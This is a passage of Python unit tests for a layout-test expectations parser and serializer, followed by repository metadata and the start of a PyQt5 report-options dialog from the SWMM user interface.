self._port.host.filesystem.join(
self._port.layout_tests_dir(),
'failures/expected/text.html'),
self._exp.get_tests_with_result_type(SKIP))
def test_bot_test_expectations(self):
"""Test that expectations are merged rather than overridden when using flaky option 'unexpected'."""
test_name1 = 'failures/expected/text.html'
test_name2 = 'passes/text.html'
expectations_dict = OrderedDict()
expectations_dict['expectations'] = 'Bug(x) %s [ Failure ]\nBug(x) %s [ Crash ]\n' % (test_name1, test_name2)
self._port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([FAIL]))
self.assertEqual(expectations.get_expectations(test_name2), set([CRASH]))
def bot_expectations():
return {test_name1: ['PASS', 'TIMEOUT'], test_name2: ['CRASH']}
self._port.bot_expectations = bot_expectations
self._port._options.ignore_flaky_tests = 'unexpected'
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([PASS, FAIL, TIMEOUT]))
self.assertEqual(expectations.get_expectations(test_name2), set([CRASH]))
class SkippedTests(Base):
def check(self, expectations, overrides, skips, lint=False, expected_results=None):
expected_results = expected_results or [WONTFIX, SKIP, FAIL]
port = MockHost().port_factory.get('test-win-win7')
port.host.filesystem.write_text_file(
port.host.filesystem.join(
port.layout_tests_dir(), 'failures/expected/text.html'),
'foo')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(skips)
expectations_to_lint = expectations_dict if lint else None
exp = TestExpectations(port, ['failures/expected/text.html'], expectations_dict=expectations_to_lint, is_lint_mode=lint)
self.assertEqual(exp.get_expectations('failures/expected/text.html'), set(expected_results))
def test_skipped_tests_work(self):
self.check(expectations='', overrides=None, skips=['failures/expected/text.html'], expected_results=[WONTFIX, SKIP])
def test_duplicate_skipped_test_fails_lint(self):
self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n',
overrides=None, skips=['failures/expected/text.html'], lint=True)
def test_skipped_file_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected'])
def test_skipped_file_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected'])
def test_skipped_entry_dont_exist(self):
port = MockHost().port_factory.get('test-win-win7')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = ''
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
capture = OutputCapture()
capture.capture_output()
TestExpectations(port)
_, _, logs = capture.restore_output()
self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)
def test_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
notrun = 'failures/expected/text.html'
self._exp.add_extra_skipped_tests([notrun])
self.assertEqual('NOTRUN', self._exp.get_expectations_string(notrun))
class ExpectationSyntaxTests(Base):
def test_unrecognized_expectation(self):
self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')
def test_macro(self):
exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
def assert_tokenize_exp(self, line, bugs=None, specifiers=None, expectations=None, warnings=None,
comment=None, name='foo.html', filename='TestExpectations'):
bugs = bugs or []
specifiers = specifiers or []
expectations = expectations or []
warnings = warnings or []
line_number = '1'
expectation_line = TestExpectationLine.tokenize_line(filename, line, line_number)
self.assertEqual(expectation_line.warnings, warnings)
self.assertEqual(expectation_line.name, name)
self.assertEqual(expectation_line.filename, filename)
self.assertEqual(expectation_line.line_numbers, line_number)
if not warnings:
self.assertEqual(expectation_line.specifiers, specifiers)
self.assertEqual(expectation_line.expectations, expectations)
def test_comments(self):
self.assert_tokenize_exp('# comment', name=None, comment='# comment')
self.assert_tokenize_exp('foo.html [ Pass ] # comment', comment='# comment', expectations=['PASS'], specifiers=[])
def test_config_specifiers(self):
self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', specifiers=['MAC'], expectations=['FAIL'])
def test_unknown_config(self):
self.assert_tokenize_exp('[ Foo ] foo.html [ Pass ]', specifiers=['Foo'], expectations=['PASS'],
warnings=['Unrecognized specifier "Foo"'])
def test_unknown_expectation(self):
self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])
def test_skip(self):
self.assert_tokenize_exp('foo.html [ Skip ]', specifiers=[], expectations=['SKIP'])
def test_slow(self):
self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'],
warnings=['SLOW tests should only be added to SlowTests and not to TestExpectations.'])
self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'], filename='SlowTests')
self.assert_tokenize_exp('foo.html [ Timeout Slow ]', specifiers=[], expectations=['SKIP', 'TIMEOUT'], warnings=[
'Only SLOW expectations are allowed in SlowTests'], filename='SlowTests')
def test_wontfix(self):
self.assert_tokenize_exp(
'foo.html [ WontFix ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'WONTFIX tests should only be added to NeverFixTests or StaleTestExpectations and not to TestExpectations.'])
self.assert_tokenize_exp(
'foo.html [ WontFix Failure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'WONTFIX tests should only be added to NeverFixTests or StaleTestExpectations and not to TestExpectations.'])
self.assert_tokenize_exp(
'foo.html [ WontFix Failure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'Only WONTFIX expectations are allowed in NeverFixTests'], filename='NeverFixTests')
self.assert_tokenize_exp(
'foo.html [ WontFix Timeout ]', specifiers=[], expectations=['WONTFIX', 'TIMEOUT'], warnings=[
'A test marked Skip or WontFix must not have other expectations.',
'Only WONTFIX expectations are allowed in NeverFixTests'], filename='NeverFixTests')
def test_blank_line(self):
self.assert_tokenize_exp('', name=None)
def test_warnings(self):
self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('[ [', warnings=['unexpected "["', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('crbug.com/12345 ]', warnings=['unexpected "]"', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('foo.html crbug.com/12345 ]',
warnings=['"crbug.com/12345" is not at the start of the line.', 'Missing expectations.'])
self.assert_tokenize_exp('foo.html', warnings=['Missing expectations.'])
class SemanticTests(Base):
def test_bug_format(self):
self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
def test_bad_bugid(self):
try:
self.parse_exp('crbug/1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
self.fail('should have raised an error about a bad bug identifier')
except ParseError as exp:
self.assertEqual(len(exp.warnings), 3)
def test_missing_bugid(self):
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=False)
self.assertFalse(self._exp.has_warnings())
try:
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=True)
except ParseError as exp:
self.assertEqual(exp.warnings, ['expectations:1 Test lacks BUG specifier. failures/expected/text.html'])
def test_skip_and_wontfix(self):
# Skip is not allowed to have other expectations as well, because those
# expectations won't be exercised and may become stale .
self.parse_exp('failures/expected/text.html [ Failure Skip ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
self.assertTrue(self._exp.has_warnings())
def test_rebaseline(self):
# Can't lint a file w/ 'REBASELINE' in it.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
is_lint_mode=True)
def test_duplicates(self):
self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ Timeout ]""", is_lint_mode=True)
self.assertRaises(ParseError, self.parse_exp,
self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ Timeout ]""", is_lint_mode=True)
def test_duplicate_with_line_before_preceding_line(self):
self.assert_bad_expectations("""Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
Bug(exp) [ Release ] failures/expected/text.html [ Failure ]
Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
""")
def test_missing_file(self):
self.parse_exp('Bug(test) missing_file.html [ Failure ]')
self.assertTrue(self._exp.has_warnings(), 1)
class PrecedenceTests(Base):
def test_file_over_directory(self):
# This tests handling precedence of specific lines over directories
# and tests expectations covering entire directories.
exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ Crash ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [CRASH])
exp_str = """
Bug(x) failures/expected [ Crash ]
Bug(y) failures/expected/text.html [ Failure ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [CRASH])
def test_ambiguous(self):
self.assert_bad_expectations('Bug(test) [ Release ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win ] passes/text.html [ Failure ]\n')
def test_more_specifiers(self):
self.assert_bad_expectations('Bug(test) [ Release ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win Release ] passes/text.html [ Failure ]\n')
def test_order_in_file(self):
self.assert_bad_expectations('Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n'
'Bug(test) [ Release ] : passes/text.html [ Pass ]\n')
def test_macro_overrides(self):
self.assert_bad_expectations('Bug(test) [ Win ] passes/text.html [ Pass ]\n'
'Bug(test) [ Win7 ] passes/text.html [ Failure ]\n')
class RemoveConfigurationsTest(Base):
def test_remove(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {
'expectations': """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ Linux Win10 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_needs_rebaseline(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ NeedsRebaseline ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ Win7 Debug ] failures/expected/foo.html [ NeedsRebaseline ]
Bug(x) [ Win10 ] failures/expected/foo.html [ NeedsRebaseline ]
""", actual_expectations)
def test_remove_multiple_configurations(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([
('failures/expected/foo.html', test_config),
('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration()),
])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_start(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_end_with_no_trailing_newline(self):
# TODO(wkorman): Simplify the redundant initialization in every test case.
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]""", actual_expectations)
def test_remove_line_leaves_comments_for_next_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should not get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_no_whitespace_lines(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_keeping_comments_before_whitespace_lines(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should not get stripped.
# This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""
# This comment line should not get stripped.
""", actual_expectations)
def test_remove_first_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_flaky_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations(
[('failures/expected/foo.html', host.port_factory.get('test-win-win10', None).test_configuration())])
self.assertEqual("""Bug(x) [ Win Debug ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
class RebaseliningTest(Base):
def test_get_rebaselining_failures(self):
# Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)
self.parse_exp(self.get_basic_expectations())
self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)
class TestExpectationsParserTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(),
test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
self._parser = TestExpectationParser(host.port_factory.get('test-win-win7', None), [], is_lint_mode=False)
def test_expectation_line_for_test(self):
# This is kind of a silly test, but it at least ensures that we don't throw an error.
test_name = 'foo/test.html'
expectations = set(['PASS', 'IMAGE'])
expectation_line = TestExpectationLine()
expectation_line.original_string = test_name
expectation_line.name = test_name
expectation_line.filename = '<Bot TestExpectations>'
expectation_line.line_numbers = '0'
expectation_line.expectations = expectations
self._parser._parse_line(expectation_line)
self.assertEqual(self._parser.expectation_line_for_test(test_name, expectations), expectation_line)
class TestExpectationSerializationTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-win7', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(),
test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
def _tokenize(self, line):
return TestExpectationLine.tokenize_line('path', line, 0)
def assert_round_trip(self, in_string, expected_string=None):
expectation = self._tokenize(in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, expectation.to_string(self._converter))
def assert_list_round_trip(self, in_string, expected_string=None):
host = MockHost()
parser = TestExpectationParser(host.port_factory.get('test-win-win7', None), [], is_lint_mode=False)
expectations = parser.parse('path', in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))
def test_unparsed_to_string(self):
expectation = TestExpectationLine()
self.assertEqual(expectation.to_string(self._converter), '')
expectation.comment = ' Qux.'
self.assertEqual(expectation.to_string(self._converter), '# Qux.')
expectation.name = 'bar'
self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
expectation.specifiers = ['foo']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
expectation.expectations = ['bAz']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
expectation.expectations = ['bAz1', 'baZ2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.specifiers = ['foo1', 'foO2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.warnings.append('Oh the horror.')
self.assertEqual(expectation.to_string(self._converter), '')
expectation.original_string = 'Yes it is!'
self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')
def test_unparsed_list_to_string(self):
expectation = TestExpectationLine()
expectation.comment = 'Qux.'
expectation.name = 'bar'
expectation.specifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertIsNone(expectation_line.to_string(self._converter))
expectation_line.matching_configurations = set([TestConfiguration('win7', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter),
'Bug(x) [ Win7 Release ] test/name/for/realz.html [ Failure ]')
expectation_line.matching_configurations = set(
[TestConfiguration('win7', 'x86', 'release'), TestConfiguration('win7', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ Win7 ] test/name/for/realz.html [ Failure ]')
def test_parsed_to_string_mac_legacy_names(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertIsNone(expectation_line.to_string(self._converter))
expectation_line.matching_configurations = set([TestConfiguration('mac10.10', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter),
'Bug(x) [ Mac10.10 Release ] test/name/for/realz.html [ Failure ]')
def test_serialize_parsed_expectations(self):
# Testing protected method - pylint: disable=protected-access
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
parsed_expectation_to_string = dict([[parsed_expectation, expectation_string]
for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'image pass')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_specifier_string(self):
# Testing protected method - pylint: disable=protected-access
expectation_line = TestExpectationLine()
expectation_line.bugs = ['garden-o-matic']
expectation_line.parsed_specifiers = ['the', 'for']
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), 'for the')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'for the win')
expectation_line.bugs = []
expectation_line.parsed_specifiers = []
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'win')
def test_format_line(self):
# Testing protected method - pylint: disable=protected-access
self.assertEqual(
TestExpectationLine._format_line(
[], ['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'),
'[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(
TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], None),
'[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = 'Nay'
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('win7', 'x86', 'release')]), True)
add_line(set([TestConfiguration('win7', 'x86', 'release'), TestConfiguration('win7', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, 'Bug(x) [ Win7 Release ] Yay [ Failure ]\nBug(x) [ Win7 ] Yay [ Failure ]')
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, 'Bug(x) [ Win7 Release ] Yay [ Failure ]\nNay')
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
|
ba7668342c359164efe26311283689b049d6aa57
|
1aa4a01014ff5408c8979d2ee91435515a376bcb
|
/src/ui/SWMM/frmReportOptions.py
|
a82ad0e856993ecc9b6d202be458090ca9586400
|
[] |
no_license
|
USEPA/SWMM-EPANET_User_Interface
|
49b41b27bfcf7a934203935ccac3cee2ed7c538c
|
d49a589fc923c716c9ff607228282073126ce6cc
|
refs/heads/dev-ui-py3qt5
| 2022-10-06T14:55:55.322050
| 2022-09-26T19:25:09
| 2022-09-26T19:25:09
| 48,242,880
| 121
| 77
| null | 2020-09-15T15:18:32
| 2015-12-18T15:41:52
|
Python
|
UTF-8
|
Python
| false
| false
| 5,843
|
py
|
frmReportOptions.py
|
import PyQt5.QtGui as QtGui
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import QMainWindow, QAbstractItemView
import core.swmm.options.report
from ui.SWMM.frmReportOptionsDesigner import Ui_frmReportOptions
class frmReportOptions(QMainWindow, Ui_frmReportOptions):
def __init__(self, main_form=None):
QMainWindow.__init__(self, main_form)
self.help_topic = "swmm/src/src/reportingoptionsdialog.htm"
self.setupUi(self)
self.cmdOK.clicked.connect(self.cmdOK_Clicked)
self.cmdCancel.clicked.connect(self.cmdCancel_Clicked)
self.cmdNodeAll.clicked.connect(self.cmdNodeAll_Clicked)
self.cmdNodeNone.clicked.connect(self.cmdNodeNone_Clicked)
self.cmdLinksAll.clicked.connect(self.cmdLinksAll_Clicked)
self.cmdLinksNone.clicked.connect(self.cmdLinksNone_Clicked)
self.cmdSubcatchmentsAll.clicked.connect(self.cmdSubcatchmentsAll_Clicked)
self.cmdSubcatchmentsNone.clicked.connect(self.cmdSubcatchmentsNone_Clicked)
self.set_from(main_form.project)
self._main_form = main_form
if (main_form.program_settings.value("Geometry/" + "frmReportOptions_geometry") and
main_form.program_settings.value("Geometry/" + "frmReportOptions_state")):
self.restoreGeometry(main_form.program_settings.value("Geometry/" + "frmReportOptions_geometry",
self.geometry(), type=QtCore.QByteArray))
self.restoreState(main_form.program_settings.value("Geometry/" + "frmReportOptions_state",
self.windowState(), type=QtCore.QByteArray))
def set_from(self, project):
# section = core.swmm.options.report.Report()
section = project.find_section("REPORT")
self.cbxContinuity.setChecked(section.continuity)
self.cbxControls.setChecked(section.controls)
